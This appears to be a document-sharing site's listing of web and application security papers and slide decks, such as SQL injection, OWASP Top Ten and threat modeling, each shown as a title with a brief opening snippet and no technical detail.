Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
Executive Summary On IronWASP
Executive Summary On IronWASP CYBER SECURITY & PRIVACY FOUNDATION 1 Software Product: IronWASP Description of the Product: IronWASP (Iron Web application Advanced Security testing Platform) is an open
DFW INTERNATIONAL AIRPORT STANDARD OPERATING PROCEDURE (SOP)
Title: Functional Category: Information Technology Services Issuing Department: Information Technology Services Code Number: xx.xxx.xx Effective Date: xx/xx/2014 1.0 PURPOSE 1.1 To appropriately manage
Payment Card Industry (PCI) Data Security Standard PFI Final Incident Report. Template for PFI Final Incident Report. Version 1.1.
Payment Card Industry (PCI) Data Security Standard PFI Final Incident Report Template for PFI Final Incident Report Version 1.1 February 2015 Document Changes Date Version Description August 2014 1.0 To
Rapid Security Framework (RSF) Taxonomie, Bewertungsparameter und Marktanalyse zur Auswahl von Fuzzing-Tools
Rapid Security Framework (RSF) Taxonomie, Bewertungsparameter und Marktanalyse zur Auswahl von Fuzzing-Tools Prof. Dr. Hartmut Pohl Peter Sakal, B.Sc. M.Sc. Motivation Attacks Industrial espionage Sabotage
Virtualization System Security
Virtualization System Security Bryan Williams, IBM X-Force Advanced Research Tom Cross, Manager, IBM X-Force Security Strategy 2009 IBM Corporation Overview Vulnerability disclosure analysis Vulnerability
Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP
Threat Modeling Categorizing the nature and severity of system vulnerabilities John B. Dickson, CISSP What is Threat Modeling? Structured approach to identifying, quantifying, and addressing threats. Threat
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
SQuAD: Application Security Testing
SQuAD: Application Security Testing Terry Morreale Ben Whaley June 8, 2010 Why talk about security? There has been exponential growth of networked digital systems in the past 15 years The great things
Exploits: XSS, SQLI, Buffer Overflow
Exploits: XSS, SQLI, Buffer Overflow These vulnerabilities continue to result in many active exploits. XSS Cross Site Scripting, comparable to XSRF, Cross Site Request Forgery. These vulnerabilities are
SQL Injection January 23, 2013
Web-based Attack: SQL Injection SQL Injection January 23, 2013 Authored By: Stephanie Reetz, SOC Analyst Contents Introduction Introduction...1 Web applications are everywhere on the Internet. Almost Overview...2
OWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
Nuclear Regulatory Commission Computer Security Office Computer Security Standard
Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
Java Web Application Security
Java Web Application Security RJUG Nov 11, 2003 Durkee Consulting www.rd1.net 1 Ralph Durkee SANS Certified Mentor/Instructor SANS GIAC Network Security and Software Development Consulting Durkee Consulting
Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map
Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map Erwin Adi and Irene Salomo School of Computer Science BINUS International BINUS University, Indonesia
Data Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business
6 Six Essential Elements of Web Application Security Cost Effective Strategies for Defending Your Business An Introduction to Defending Your Business Against Today s Most Common Cyber Attacks When web
